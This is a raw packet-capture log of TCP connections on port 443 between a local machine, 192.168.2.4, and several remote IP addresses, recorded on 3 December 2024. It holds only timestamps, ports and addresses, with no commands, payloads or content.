                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.401500940 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.401563883 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.401575089 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.446135998 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.452878952 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.456747055 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.456806898 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.456834078 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.465784073 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.465838909 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.465847015 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.473881006 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.473928928 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.473937035 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.482031107 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.482094049 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.482101917 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.488359928 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.490135908 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.490186930 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.490195036 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.494467020 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.494513035 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.494520903 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.499582052 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.499634027 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.499641895 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.504002094 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.504051924 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.504056931 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.507597923 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.507651091 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.507658958 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.510034084 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.510099888 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.510106087 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.518100977 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.518155098 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.518161058 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.518188000 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.518229008 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.518271923 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.518286943 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.522022963 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.522083998 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.522095919 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.523786068 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.523818970 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.523900986 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.524154902 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.524159908 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.528419018 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.528580904 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.528590918 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.528599977 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.528641939 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.568114996 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.615328074 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.654321909 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.656836033 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.656884909 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.656898975 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.661950111 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.661993980 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.662002087 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.662014961 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.662070990 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.662343025 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.662357092 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.845885038 CET44349740142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.845942020 CET44349740142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.845989943 CET49740443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.922646999 CET49740443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.922671080 CET44349740142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.152904987 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.152935982 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.152945042 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.152966976 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.152980089 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.152980089 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.152992010 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.153009892 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.153023958 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.153037071 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.153059006 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.172566891 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.172640085 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.172650099 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.172770977 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.172818899 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.560592890 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.560889006 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.560928106 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.561220884 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.561490059 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.561551094 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.561628103 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.607336998 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.753792048 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.753994942 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.754007101 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.754296064 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.754544020 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.754596949 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.754645109 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.799335003 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:53.808835983 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.010581017 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.011398077 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.011431932 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.011516094 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.011552095 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.011594057 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.012658119 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.013768911 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.013820887 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.013828993 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.026592970 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.026644945 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.026654005 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.035154104 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.035202980 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.035211086 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.088723898 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.131987095 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.186086893 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.186103106 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.206923962 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.206976891 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.206984997 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.209522009 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.209584951 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.210536957 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.210709095 CET49761443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.210722923 CET44349761104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.214000940 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.214045048 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.214104891 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.214323044 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.214329004 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.215008020 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.215055943 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.215065002 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.224586964 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.224649906 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.224657059 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.231477022 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.231528044 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.231539011 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.239310026 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.239384890 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.239392042 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.247633934 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.247683048 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.247689962 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.255419016 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.255486012 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.255492926 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.264023066 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.264081955 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.264091969 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.280661106 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.280735970 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.280741930 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.286062002 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.286117077 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.286123991 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.292716026 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.292792082 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.292798996 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.299676895 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.299726963 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.299735069 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.351711035 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.395407915 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.445601940 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.445609093 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.491830111 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.511817932 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.514885902 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.514965057 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.514981985 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.528085947 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.528143883 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.528152943 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.528193951 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.539463997 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.539473057 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.539545059 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.539706945 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.539757967 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.548419952 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.548429012 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.548481941 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.557532072 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.557538986 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.557604074 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.562413931 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.562421083 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.562477112 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.566320896 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.566346884 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.566359997 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.566365957 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.571959972 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.571966887 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.572022915 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.581595898 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.581603050 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.581654072 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.586090088 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.586096048 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.586148977 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.594973087 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.595029116 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.604096889 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.604149103 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.608839989 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.608923912 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.618176937 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.618246078 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.636564970 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.636620998 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.640641928 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.640700102 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.649876118 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.649929047 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.649936914 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.649952888 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.649975061 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.649996996 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.650084019 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.650094986 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.692595005 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.692625999 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.692687988 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.692995071 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.693006992 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.707581043 CET49745443192.168.2.4172.67.211.241
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.751331091 CET44349745172.67.211.241192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.856961966 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.857033014 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.857114077 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.857389927 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:54.857410908 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.054788113 CET44349745172.67.211.241192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.054842949 CET44349745172.67.211.241192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.054997921 CET49745443192.168.2.4172.67.211.241
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.055655956 CET49745443192.168.2.4172.67.211.241
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.055665016 CET44349745172.67.211.241192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.198116064 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.198158026 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.198230982 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.198427916 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.198445082 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.700953960 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.703933954 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.703965902 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.704432964 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.706655025 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.706732988 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.706803083 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.747340918 CET44349766104.18.94.41192.168.2.4
